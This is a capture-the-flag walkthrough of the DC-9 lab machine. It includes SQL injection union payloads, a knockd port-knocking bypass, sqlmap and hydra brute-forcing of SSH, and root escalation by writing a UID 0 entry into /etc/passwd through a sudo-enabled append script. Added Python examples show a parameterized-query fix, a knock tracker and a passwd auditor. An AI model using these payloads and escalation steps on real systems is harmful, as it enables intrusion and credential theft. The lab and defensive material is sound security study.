First, netdiscover is used to scan for the target; its IP address is 192.168.244.135.
┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -r 192.168.244.0/24
Currently scanning: 192.168.244.0/24 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.244.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.244.2 00:50:56:f7:b2:38 1 60 VMware, Inc.
192.168.244.135 00:0c:29:e4:f7:0d 1 60 VMware, Inc.
192.168.244.254 00:50:56:ed:d6:50 1 60 VMware, Inc.
Next, scanning the target with Nmap shows port 22 filtered and port 80 open.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sF 192.168.244.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-05 04:04 EST
Nmap scan report for 192.168.244.135
Host is up (0.0017s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open|filtered http
MAC Address: 00:0C:29:E4:F7:0D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds
Try accessing the web service.
Test the Search section for SQL injection.
Use order by to guess the number of columns; the query returns 6 columns.
Confirm the column count with union select.
Retrieve the database name and the current database version.
Retrieve the table names in the current database.
Fred' union select 1,2,3,4,database(),group_concat(table_name) from information_schema.tables where table_schema=database();#
Look at the table's columns and dump their contents.
Fred' union select 1,2,3,4,5,group_concat(UserID,Username,Password) from Staff.Users;#
After obtaining the usernames and password hashes, crack the hashes and log in through the web interface.
The username and password are admin:transorbital1.
The "File does not exist" message on the Manage page suggests a file inclusion vulnerability, which we brute-force with BurpSuite.
Note that the payload must not be URL-encoded when sending the request.
Next we obtained usernames, but the SSH port is not open. Under /etc we found /etc/knockd.conf: knockd controls opening and closing of the SSH port, and according to its configuration the port only opens after the specified ports are hit in order.
From the configuration file, knocking ports 7469, 8475 and 9842 in that order opens the SSH port. nc or nmap can be used to knock.
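As an added example (not code from the original write-up or from DC-9 itself), the following Python reproduces the search-page weakness above with an in-memory SQLite database: the page's union payload leaks the users table through a string-built query, while the same query with a bound parameter treats the payload as plain data. Table and column names are assumed to resemble the page's Staff.Users; all rows and hash values are constructed, and the payload's comment is "--" because SQLite does not accept MySQL's "#".

```python
import sqlite3

# Constructed in-memory stand-in for the DC-9 database: a staff table that the
# search page queries, and a separate users table holding login hashes.
# Names and hash values are made up for this example.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE StaffDetails(id, firstname, lastname, position, phone, email);
        CREATE TABLE Users(UserID, Username, Password);
        INSERT INTO StaffDetails VALUES
            (1, 'Fred', 'Flintstone', 'Quarry worker', '0123', 'fred@example.test'),
            (2, 'Barney', 'Rubble', 'Quarry worker', '0456', 'barney@example.test');
        INSERT INTO Users VALUES
            (1, 'admin', 'md5-hash-placeholder-1'),
            (2, 'fredf', 'md5-hash-placeholder-2');
    """)
    return conn

def search_vulnerable(conn, term):
    # Builds the query by string formatting, so the search term is parsed as SQL.
    query = ("SELECT id, firstname, lastname, position, phone, email "
             f"FROM StaffDetails WHERE firstname = '{term}'")
    return conn.execute(query).fetchall()

def search_fixed(conn, term):
    # Bound parameter: the term stays data, whatever characters it contains.
    query = ("SELECT id, firstname, lastname, position, phone, email "
             "FROM StaffDetails WHERE firstname = ?")
    return conn.execute(query, (term,)).fetchall()

# The page's union payload (6 columns, group_concat in the last), adapted to SQLite.
PAYLOAD = ("Fred' union select 1,2,3,4,5,"
           "group_concat(UserID||':'||Username||':'||Password) from Users -- ")

def leaked_rows(rows):
    # A staff row always carries an e-mail in column 6; anything else came from the union.
    return [r for r in rows if "@" not in str(r[5])]

if __name__ == "__main__":
    db = make_db()
    vuln = search_vulnerable(db, PAYLOAD)
    print("vulnerable query:", len(vuln), "rows,", len(leaked_rows(vuln)), "from Users")
    print("parameterised query:", len(search_fixed(db, PAYLOAD)), "rows")
```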
┌──(kali㉿kali)-[~]
└─$ nc 192.168.244.135 7469
(UNKNOWN) [192.168.244.135] 7469 (?) : Connection refused
┌──(kali㉿kali)-[~]
└─$ nc 192.168.244.135 8475
(UNKNOWN) [192.168.244.135] 8475 (?) : Connection refused
┌──(kali㉿kali)-[~]
└─$ nc 192.168.244.135 9842
(UNKNOWN) [192.168.244.135] 9842 (?) : Connection refused
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -p22 192.168.244.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-05 06:20 EST
Nmap scan report for 192.168.244.135
Host is up (0.0011s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
MAC Address: 00:0C:29:E4:F7:0D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.69 seconds
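As an added example (not from the original write-up, and not DC-9's own knockd.conf), the following Python models how knockd tracks a knock sequence per source address. The three ports come from the page; the 10-second window and the reset-on-wrong-port rule are assumptions mirroring knockd's seq_timeout behaviour. knockd sniffs the SYN packets with libpcap, which is why the refused nc connections above still count; replaying SYN records taken from a firewall log through the model shows which sources actually completed the sequence.

```python
# Knock sequence taken from the page; timeout and reset rule are assumptions.
KNOCK_SEQUENCE = (7469, 8475, 9842)
SEQ_TIMEOUT = 10.0

class KnockTracker:
    """Tracks each source's progress through the knock sequence, as knockd does."""
    def __init__(self, sequence=KNOCK_SEQUENCE, timeout=SEQ_TIMEOUT):
        self.sequence = sequence
        self.timeout = timeout
        self.progress = {}   # src_ip -> (index of next expected port, time of last knock)
        self.opened = []     # (src_ip, time) events where the full sequence was completed

    def observe(self, src_ip, port, ts):
        """Feed one inbound SYN; returns True when this knock completes the sequence."""
        idx, last = self.progress.get(src_ip, (0, ts))
        if idx and ts - last > self.timeout:
            idx = 0                              # too slow: the attempt starts over
        if port != self.sequence[idx]:
            self.progress[src_ip] = (0, ts)      # wrong port: the attempt is reset
            return False
        idx += 1
        if idx == len(self.sequence):
            self.progress[src_ip] = (0, ts)
            self.opened.append((src_ip, ts))     # knockd would now run its start_command
            return True
        self.progress[src_ip] = (idx, ts)
        return False

def replay(tracker, syns):
    """Replay (timestamp, src_ip, dst_port) SYN records, e.g. parsed from a firewall log."""
    return [tracker.observe(ip, port, ts) for ts, ip, port in syns]

# Constructed SYN records: a correct knock, a wrong-order attempt and a timed-out one.
SAMPLE_SYNS = [
    (0.0, "10.0.0.5", 7469), (0.4, "10.0.0.5", 8475), (0.9, "10.0.0.5", 9842),
    (1.0, "10.0.0.9", 8475), (1.2, "10.0.0.9", 7469), (1.5, "10.0.0.9", 9842),
    (5.0, "10.0.0.7", 7469), (6.0, "10.0.0.7", 8475), (30.0, "10.0.0.7", 9842),
]

if __name__ == "__main__":
    tracker = KnockTracker()
    replay(tracker, SAMPLE_SYNS)
    print("sources that opened the port:", tracker.opened)
```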
The SSH port is now open, but we have no SSH username or password, so we use sqlmap to dump the database contents and then brute-force SSH users and passwords. First, save the HTTP request for the injection point to a file.
POST /results.php HTTP/1.1
Host: 192.168.244.135
Content-Length: 21
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.244.135
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.244.135/search.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
search=%27or+1%3D1%23
Then dump the table contents with the following command.
┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ sqlmap -r inject.txt -D users -T UserDetails --dump
······
[06:54:44] [INFO] table 'users.UserDetails' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.244.135/dump/users/UserDetails.csv'
Next, process the file contents and brute-force.
┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ mv /home/kali/.local/share/sqlmap/output/192.168.244.135/dump/users/UserDetails.csv ./user.txt
┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ cut user.txt -d "," -f "3" > passwd.lst
┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ cut user.txt -d "," -f "5" > user.lst
┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ hydra -L user.lst -P passwd.lst ssh://192.168.244.135
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-05 06:57:02
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 361 login tries (l:19/p:19), ~23 tries per task
[DATA] attacking ssh://192.168.244.135:22/
[22][ssh] host: 192.168.244.135 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.244.135 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.244.135 login: janitor password: Ilovepeepee
[STATUS] 341.00 tries/min, 341 tries in 00:01h, 21 to do in 00:01h, 15 active
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-05 06:58:08
With passwords in hand, we log in and try to escalate privileges. None of the three accounts has sudo rights, but the janitor user's home directory contains hidden files.
janitor@dc-9:~$ ls -la
total 16
drwx------ 4 janitor janitor 4096 Mar 5 21:57 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 janitor janitor 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 janitor janitor 4096 Mar 5 21:57 .gnupg
drwx------ 2 janitor janitor 4096 Dec 29 2019 .secrets-for-putin
janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
Use these passwords for another brute-force run.
┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ hydra -L user.lst -P newpass.lst ssh://192.168.244.135
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-05 07:06:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 114 login tries (l:19/p:6), ~8 tries per task
[DATA] attacking ssh://192.168.244.135:22/
[22][ssh] host: 192.168.244.135 login: fredf password: B4-Tru3-001
[22][ssh] host: 192.168.244.135 login: joeyt password: Passw0rd
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-05 07:06:27
Check the sudo -l privileges.
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fredf may run the following commands on dc-9:
(root) NOPASSWD: /opt/devstuff/dist/test/test
Go to the parent directory of that executable and look at the source of test.py.
#!/usr/bin/python
import sys

# Expects exactly two arguments: a file to read and a file to append to.
if len(sys.argv) != 3:
    print("Usage: python test.py read append")
    sys.exit(1)
else:
    # No path restriction of any kind: run as root via sudo, this reads any file
    # and appends its contents to any other file.
    f = open(sys.argv[1], "r")
    output = f.read()
    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()
From the source we see that the program expects three argv entries (the script name plus two arguments): it reads the file named by the first argument and appends its contents to the file named by the second. We can therefore construct a user entry with root privileges and write it into /etc/passwd to escalate. First, use the program to read the shadow file and obtain the entry of a user whose password we already know.
fredf@dc-9:/opt/devstuff$ sudo ./dist/test/test /etc/shadow ./shadow
fredf@dc-9:/opt/devstuff$ cat shadow
······
janitor:$6$bQhC0fZ9g9313Aat$aZ0GecSMTi1qUGqSF6eAdGu2pDXRg1Zu8JzLyyhvSAwh8MnLzv3XPnu6Vw9OruPsgAGgA2dCYdOuk9T4hgDZ6/:18259:0:99999:7:::
Modify this entry to the following and save it as /tmp/test.
hacker:$6$bQhC0fZ9g9313Aat$aZ0GecSMTi1qUGqSF6eAdGu2pDXRg1Zu8JzLyyhvSAwh8MnLzv3XPnu6Vw9OruPsgAGgA2dCYdOuk9T4hgDZ6/:0:0:root:/root:/bin/bash
Then write it with the test program (use single quotes) and su to escalate (enter janitor's password here).
fredf@dc-9:/opt/devstuff$ echo 'hacker:$6$bQhC0fZ9g9313Aat$aZ0GecSMTi1qUGqSF6eAdGu2pDXRg1Zu8JzLyyhvSAwh8MnLzv3XPnu6Vw9OruPsgAGgA2dCYdOuk9T4hgDZ6/:0:0:root:/root:/bin/bash' > /tmp/test
fredf@dc-9:/opt/devstuff$ sudo ./dist/test/test /tmp/test /etc/passwd
fredf@dc-9:/opt/devstuff$ su hacker
After escalation, the flag is obtained.
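As an added example (not from the original write-up), the following Python is the check a defender would run to catch the result of the escalation above: an /etc/passwd entry that carries a crypt hash in its password field instead of "x", or a second UID 0 account. The sample file is constructed, and its hash is a placeholder rather than the value on the page.

```python
# Constructed /etc/passwd sample: a normal root line, a service account, a user, and
# an entry appended the way the page describes (crypt hash in field 2, UID 0).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fredf:x:1001:1001:Fred Flintstone:/home/fredf:/bin/bash
hacker:$6$saltsalt$PLACEHOLDERHASH:0:0:root:/root:/bin/bash
"""

# Password-field values that mean "look in /etc/shadow" or "account locked".
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}

def audit_passwd(text):
    """Return a list of (username, reason) findings for the body of an /etc/passwd file."""
    findings = []
    seen = set()
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", "malformed entry"))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if pw == "":
            findings.append((name, "empty password field"))
        elif pw not in SHADOWED_OR_LOCKED:
            # A hash here bypasses the root-only protection that /etc/shadow gives it.
            findings.append((name, "password hash stored in /etc/passwd"))
        if uid == "0" and name != "root":
            findings.append((name, "extra UID 0 account"))
        if name in seen:
            findings.append((name, "duplicate username"))
        seen.add(name)
    return findings

if __name__ == "__main__":
    # On a real host, read "/etc/passwd" instead of the constructed sample.
    for name, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"{name}: {reason}")
```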